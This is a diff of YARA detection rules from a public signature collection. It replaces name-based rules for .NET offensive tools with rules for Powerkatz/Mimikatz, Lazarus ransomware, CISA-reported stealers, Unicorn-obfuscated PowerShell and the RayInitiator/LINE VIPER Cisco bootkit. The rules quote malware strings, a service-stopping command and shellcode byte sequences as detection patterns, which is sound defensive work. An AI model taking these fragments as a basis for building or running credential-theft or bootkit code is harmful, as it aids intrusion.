+rule SIGNATURE_BASE_Powerkatz_DLL_Generic : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "e2d3c4e2-404b-59f8-b3d0-a7cef4dfd0ff"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/EncodeGroup/AggressiveProxy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L406-L419"
+		description = "Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7464f8a1-9f45-580b-8a97-a57071092e3c"
+		date = "2016-02-05"
+		modified = "2023-12-05"
+		reference = "PowerKatz Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powerkatz.yar#L9-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "702b0cc858cb1687962ac403a730e5f778bf51fc91627c50103e4299f4a3ca5f"
-		score = 75
+		logic_hash = "979cdb42b54a26960b3173d5ea6abcc5fa61bef57f98b09e55eb4c75f1040a40"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "c20f30326fcebad25446cf2e267c341ac34664efad5c50ff07f0738ae2390eae"
+		hash2 = "1e67476281c1ec1cf40e17d7fc28a3ab3250b474ef41cb10a72130990f0be6a0"
+		hash3 = "49e7bac7e0db87bf3f0185e9cf51f2539dbc11384fefced465230c4e5bce0872"
 
 	strings:
-		$name = "AggressiveProxy" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$s1 = "%3u - Directory '%s' (*.kirbi)" fullword wide
+		$s2 = "%*s  pPublicKey         : " fullword wide
+		$s4 = "<3 eo.oe ~ ANSSI E>" fullword wide
+		$s5 = "\\*.kirbi" wide
+		$c1 = "kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x%08x)" fullword wide
+		$c2 = "kuhl_m_lsadump_getComputerAndSyskey ; kuhl_m_lsadump_getSyskey KO" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them ) or 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Msbuildapicaller : FILE
+rule SIGNATURE_BASE_APT_MAL_NK_Lazarus_VHD_Ransomware_Oct20_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "143da57f-b01f-5688-b741-1bc4d06cd7d1"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/rvrsh3ll/MSBuildAPICaller"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L421-L434"
+		description = "Detects Lazarus VHD Ransomware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5cb3c136-ec5c-5596-8dcc-e4c6ef33050a"
+		date = "2020-10-05"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_vhd_ransomware.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3c1f33c759e6331c562dbf76ce7e34ee82d10070e331d0967143d9d7fad077fc"
+		logic_hash = "95c56c5111bb227da8f8a3f8aa4f23e1348bc76ff76a05fc3cae89f9fad1bb52"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6"
+		hash2 = "5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473"
+		hash3 = "6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306"
 
 	strings:
-		$name = "MSBuildAPICaller" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$s1 = "HowToDecrypt.txt" wide fullword
+		$s2 = "rsa.cpp" wide fullword
+		$s3 = "sc stop \"Microsoft Exchange Compliance Service\"" ascii fullword
+		$op1 = { 8b 8d bc fc ff ff 8b 94 bd 34 03 00 00 33 c0 50 }
+		$op2 = { 8b 8d 98 f9 ff ff 8d 64 24 00 8b 39 3b bc 85 34 }
+		$op3 = { 8b 94 85 34 03 00 00 89 11 40 83 c1 04 3b 06 7c }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Graykeylogger : FILE
+rule SIGNATURE_BASE_APT_MAL_NK_Lazarus_VHD_Ransomware_Oct20_2 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "c63875b6-1701-5594-927e-833c25dc5d98"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/DarkSecDevelopers/GrayKeylogger"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L436-L449"
+		description = "Detects Lazarus VHD Ransomware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b75668de-93e6-57e7-90f0-fa335295be7c"
+		date = "2020-10-05"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_vhd_ransomware.yar#L26-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b8e12c5ddf0d50d0b3681594c8bc3410a24dab00035a5959e20d20045dacbbbd"
+		logic_hash = "cf28771a854b3bacc911375c09f6c6bc6ddebff95612a509890c56a5a14e8921"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "097ca829e051a4877bca093cee340180ff5f13a9c266ad4141b0be82aae1a39b"
+		hash2 = "73a10be31832c9f1cbbd798590411009da0881592a90feb472e80025dfb0ea79"
 
 	strings:
-		$name = "GrayKeylogger" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$op1 = { f9 36 88 08 8d ad fc ff ff ff 66 ff c1 e9 72 86 }
+		$op2 = { c6 c4 58 0f a4 c8 12 8d ad ff ff ff ff 0f b6 44 }
+		$op3 = { 88 02 66 c1 f0 54 8d bf fc ff ff ff 0f ba e0 19 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 9000KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Weevely3 : FILE
+rule SIGNATURE_BASE_APT_MAL_CISA_10365227_03_Clientuploader_Dec21 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "6bf766b6-d065-5a84-8258-3be448b9cbb8"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/epinna/weevely3"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L451-L464"
+		description = "Detects ClientUploader onedrv"
+		author = "CISA Code & Media Analysis"
+		id = "4eeadb28-9312-5602-932a-36acb48772f4"
+		date = "2021-12-23"
+		modified = "2021-12-24"
+		reference = "https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stealer_cisa_ar22_277a.yar#L4-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c57c6ba5276679a2d32e9b0ebb61059c5bed1ba45f9792ecef3d5c7244f38f24"
-		score = 75
+		logic_hash = "76f552b2416ae2426b73a321485f34a611c2a3c1ca35791bc9f1834072dc28be"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "84164e1e8074c2565d3cd178babd93694ce54811641a77ffdc8d1084dd468afb"
 
 	strings:
-		$name = "weevely3" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$s1 = "Decoder2"
+		$s2 = "ClientUploader"
+		$s3 = "AppDomain"
+		$s4 = { 5F 49 73 52 65 70 47 ?? 44 65 63 6F 64 65 72 73 }
+		$s5 = "LzmaDecoder"
+		$s6 = "$ee1b3f3b-b13c-432e-a461-e52d273896a7"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Fudgec2 : FILE
+rule SIGNATURE_BASE_APT_MAL_CISA_10365227_01_APPSTORAGE_Dec21 : APPSTORAGE FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "a8e70bce-76dd-53dc-9a19-1cc6795fdef3"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/Ziconius/FudgeC2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L466-L479"
+		description = "Detects AppStorage ntstatus msexch samples"
+		author = "CISA Code & Media Analysis"
+		id = "a44c5609-980f-5961-921c-6b1824cdd49c"
+		date = "2021-12-23"
+		modified = "2021-12-24"
+		reference = "https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stealer_cisa_ar22_277a.yar#L25-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "89f3bf4b81a901e813c3021422c362d7e075dec7fd76240be121f677039f1994"
-		score = 75
+		logic_hash = "6a46bc4efa1f22d9fc65d946dbaa7b94de6074e65c228373bb6001f152d5b603"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "APPSTORAGE, FILE"
+		family = "APPSTORAGE"
+		hash1 = "157a0ffd18e05bfd90a4ec108e5458cbde01015e3407b3964732c9d4ceb71656"
+		hash2 = "30191b3badf3cdbc65d0ffeb68e0f26cef10a41037351b0f562ab52fce7432cc"
 
 	strings:
-		$name = "FudgeC2" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$s1 = "026B924DD52F8BE4A3FEE8575DC"
+		$s2 = "GetHDDId"
+		$s3 = "AppStorage"
+		$s4 = "AppDomain"
+		$s5 = "$1e3e5580-d264-4c30-89c9-8933c948582c"
+		$s6 = "hrjio2mfsdlf235d" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_Reverse_Tcp : FILE
+rule SIGNATURE_BASE_APT_MAL_CISA_10365227_02_Clientuploader_Dec21 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "a6b935cc-adb6-5ff4-a832-1043e77292f7"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/DamonMohammadbagher/NativePayload_Reverse_tcp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L481-L494"
+		description = "Detects ClientUploader_mqsvn"
+		author = "CISA Code & Media Analysis"
+		id = "84351df9-e225-5c3f-9385-523246681a97"
+		date = "2021-12-23"
+		modified = "2021-12-24"
+		reference = "https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stealer_cisa_ar22_277a.yar#L48-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "055ee105cd46e54b4f49dd92975ecc08a6184fa8508585ee528d19de34914758"
-		score = 75
-		quality = 85
+		logic_hash = "f9f82b4577568d0bd60bac0d3132ed7ffcb338f508a8689f3126f3d2440432ef"
+		score = 80
+		quality = 81
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3585c3136686d7d48e53c21be61bb2908d131cf81b826acf578b67bb9d8e9350"
 
 	strings:
-		$name = "NativePayload_Reverse_tcp" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$s1 = "UploadSmallFileWithStopWatch"
+		$s2 = "UploadPartWithStopwatch"
+		$s3 = "AppVClient"
+		$s4 = "ClientUploader"
+		$s5 = { 46 69 6C 65 43 6F 6E 74 61 69 6E 65 72 2E 46 69 6C 65 41 72 63 68 69 76 65 }
+		$s6 = { 4F 6E 65 44 72 69 76 65 43 6C 69 65 6E 74 2E 4F 6E 65 44 72 69 76 65 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Sharphose : FILE
+rule SIGNATURE_BASE_Gen_Unicorn_Obfuscated_Powershell : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "89b00eb0-f1a2-5c77-a5b0-2329b08aadb7"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/ustayready/SharpHose"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L496-L509"
+		description = "PowerShell payload obfuscated by Unicorn toolkit"
+		author = "John Lambert @JohnLaTwC"
+		id = "0235795b-6d0b-5bba-8ae6-606c3b613c86"
+		date = "2018-04-03"
+		modified = "2023-12-05"
+		reference = "https://github.com/trustedsec/unicorn/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_unicorn_obfuscated_powershell.yar#L1-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e3af2a156c2451f7ed2fe3e888fdf2ae080298f7eff56801ddc0c612f04902ee"
+		hash = "b93d2fe6a671a6a967f31d5b3a0a16d4f93abcaf25188a2bbdc0894087adb10d"
+		logic_hash = "cb0044d5ee146213c96161d52880ce6c20d5884d57620c73f359673d4ae4b76b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash2 = "1afb9795cb489abce39f685a420147a2875303a07c32bf7eec398125300a460b"
 
 	strings:
-		$name = "SharpHose" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$h1 = "powershell"
+		$sa1 = ".value.toString() 'JAB"
+		$sa2 = ".value.toString() ('JAB"
+		$sb1 = "-w 1 -C \"s"
+		$sb2 = "/w 1 /C \"s"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		filesize < 20KB and uint32be( 0 ) == 0x706f7765 and $h1 at 0 and ( uint16be( filesize -2 ) == 0x2722 or ( uint16be( filesize -2 ) == 0x220a and uint8( filesize -3 ) == 0x27 ) or ( uint16be( filesize -2 ) == 0x2922 and uint8( filesize -3 ) == 0x27 ) ) and ( 1 of ( $sa* ) and 1 of ( $sb* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_RAT_Njrat_0_7D_Modded_Source_Code : FILE
+rule SIGNATURE_BASE_MAL_Cisco_Rayinitiator_Stage_1
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "2b7d1f75-0164-561e-8199-32c601cbca98"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/AliBawazeEer/RAT-NjRat-0.7d-modded-source-code"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L511-L524"
+		description = "Detects RayInitiator GRUB bootkit stage 1 code that searches for the 'Booting the kernel' string."
+		author = "NCSC"
+		id = "9805bc8c-ca98-54f1-92e0-d05a0bd68636"
+		date = "2025-09-25"
+		modified = "2025-09-27"
+		reference = "https://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L1-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f437195348452242adc8b55d6d517a17764c53188fa2de5cd15848fd23827381"
-		score = 75
+		logic_hash = "e657de97954545f06fc6997a3221eb77037fb89c6c56f08eeb78be615512a3e4"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$name = "RAT-NjRat-0.7d-modded-source-code" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$xc1 = {
+         BB 00 00 40 00 43 81 FB 00 00 60 00 0F 87 AB 00 00 00
+         8B 3B 81 FF 64 6F 6E 65 75 E9 83 C3 04 8B 3B 81 FF 2E 0A 42 6F 75
+         DC 83 C3 04 8B 3B 81 FF 6F 74 69 6E 75 CF 83 C3 04 8B 3B 81 FF 67
+         20 74 68 75 C2 83 C3 04 8B 3B 81 FF 65 20 6B 65 75 B5 83 C3 04 8B
+         3B 81 FF 72 6E 65 6C 75 A8 83 EB 14
+      }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		$xc1
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Rdpthief : FILE
+rule SIGNATURE_BASE_MAL_Cisco_Rayinitiator_Stage_2
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "5ad4feec-50db-5ebb-a609-9196e72a24aa"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/0x09AL/RdpThief"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L526-L539"
+		description = "Detects RayInitiator GRUB bootkit stage 2 code that identifies the Linux kernel syscall table."
+		author = "NCSC"
+		id = "30d32c60-7557-54d7-b995-53845d6e0d4c"
+		date = "2025-09-25"
+		modified = "2025-09-27"
+		reference = "https://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L21-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8e472c8265d517e512eada819627d56ff449fae4d80054946e9ea96f74004f05"
-		score = 75
+		logic_hash = "27f040bc14caec745f04fa32de08955a09857a801e5f2f04936fffca991c9d19"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$name = "RdpThief" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$xc1 = {
+         49 89 E0 48 83 F8 30 0F 84 70 00 00 00 49 01 C0 49 8B
+         10 48 83 C0 08 66 85 D2 75 E4 BF ?? ?? 60 00 48 8B 3C 17 48 BE 6E
+         6D 69 5F 6D 61 78 5F
+      }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		$xc1
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Runascs : FILE
+rule SIGNATURE_BASE_MAL_Cisco_Rayinitiator_Stage_3
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "c5fc5b01-1d30-5af5-be99-e629cb23295b"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/antonioCoco/RunasCs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L541-L554"
+		description = "Detects RayInitiator GRUB bootkit stage 3 install phase code that searches for the 'client-cert-fail' string."
+		author = "NCSC"
+		id = "329e0713-5637-5e24-bd7b-9d7cf63e2f6b"
+		date = "2025-09-25"
+		modified = "2025-09-27"
+		reference = "https://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L39-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9fd22a3e92222134c101693b944a2ad53055f9cfafe99823fd6f412981f5afa3"
-		score = 75
+		logic_hash = "332756bc77cc17c3330ce1ffb0af9d1a7c0f5f9a457f7e9ad7f4081d7aba50c6"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$name = "RunasCs" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$xc1 = {
+         48 81 EE 00 00 00 08 48 B8 63 6C 69 65 6E 74 2D 63 49
+         B8 65 72 74 2D 66 61 69 6C 48 FF C6 48 39 D6 0F 87 D2
+         00 00 00 48 8B 3E 48 39 C7
+      }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		$xc1
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_IP6DNS : FILE
+rule SIGNATURE_BASE_MAL_Cisco_Rayinitiator_Stage_3_LINE_VIPER_Shellcode
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "3b32b408-e71a-5f2a-ae6f-72a3d6572b71"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/DamonMohammadbagher/NativePayload_IP6DNS"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L556-L569"
+		description = "Detects RayInitiator GRUB bootkit stage 3 deploy phase code that copies LINE VIPER shellcode stub and marks executable."
+		author = "NCSC"
+		id = "2b0cee4a-3c16-51f0-9c36-87364a34aa2f"
+		date = "2025-09-25"
+		modified = "2025-09-27"
+		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/RayInitiator-LINE-VIPER/ncsc-mar-rayinitiator-line-viper.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L57-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "509c396b97524335735107644460eebed3146b2bc5f8dedb909c9754b2121f5f"
-		score = 75
+		logic_hash = "e509bde73d8843b188d632fa44bb4d90ff9d1766138c830c2932e503c5a07197"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$name = "NativePayload_IP6DNS" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$xc1 = {
+         48 89 FA 48 83 C7 40 4C 89 CE B9 D0 01 00 00 F3 A4 48
+         89 D7 48 83 C7 40 48 89 3A 48 C1 EF 0C 48 C1 E7 0C BA
+         07 00 00 00 48 C7 C6 00 20 00 00
+      }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		$xc1
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_ARP : FILE
+rule SIGNATURE_BASE_MAL_Cisco_LINE_VIPER_Shellcode_Deobfuscation_Routine
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "9fac11f8-4e40-5cbc-a990-2ae48df20828"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/DamonMohammadbagher/NativePayload_ARP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L571-L584"
+		description = "Detects LINE VIPER Cisco ASA malware code as part of a shellcode deobfuscation routine."
+		author = "NCSC"
+		id = "6b9be484-87d2-59aa-b477-3f4cb3d5a051"
+		date = "2025-09-25"
+		modified = "2025-09-27"
+		reference = "https://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L74-L93"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e8cecfe09f1cb80eb693eb293dfb8c1bc3885a96dfa045b2391216c5f6f6f983"
-		score = 75
+		logic_hash = "9feb3703a99c529b28c12646a0834e77d3377f1fd75ec69c46201cb0d4d22775"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$name = "NativePayload_ARP" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$xc1 = {
+         48 8B 7F 08 48 8D 5F 70 49 C7 C1 00 18 00 00 49 C7 C0
+         20 00 00 00 48 89 DF 8A 01 32 07 48 FF C7 41 FF C8 4D 85 C0 75 F3
+         88 01 48 FF C1 41 FF C9 4D 85 C9 75 DA
+      }
+		$x1 = "SIt/CEiNX3BJx8EAGAAAScfAIAAAAEiJ34oBMgdI/8dB/8hNhcB184gBSP/BQf/JTYXJdd"
+		$x2 = "iLfwhIjV9wScfBABgAAEnHwCAAAABIid+KATIHSP/HQf/ITYXAdfOIAUj/wUH/yU2FyXXa"
+		$x3 = "Ii38ISI1fcEnHwQAYAABJx8AgAAAASInfigEyB0j/x0H/yE2FwHXziAFI/8FB/8lNhcl12"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_C2Bridge : FILE
+rule SIGNATURE_BASE_MAL_Cisco_LINE_VIPER_Shellcode_Initial_Execution
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "357051aa-61ea-5454-a996-b4e3a45ac865"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/cobbr/C2Bridge"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L586-L599"
+		description = "Detects LINE VIPER Cisco ASA malware code as part of shellcode initial execution."
+		author = "NCSC (modifier by Florian Roth)"
+		id = "f8e56937-c4af-59ab-9698-21b69b160951"
+		date = "2025-09-25"
+		modified = "2025-09-27"
+		reference = "https://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L95-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d5f6d6e9d475bf2d8a49d7550bf3b718539753f3494b58462094bfc0a37b813a"
-		score = 75
+		logic_hash = "813aa79525bb43f62d98142eced501f793764e90a86c7176a686f9017f32eb4b"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$name = "C2Bridge" ascii wide
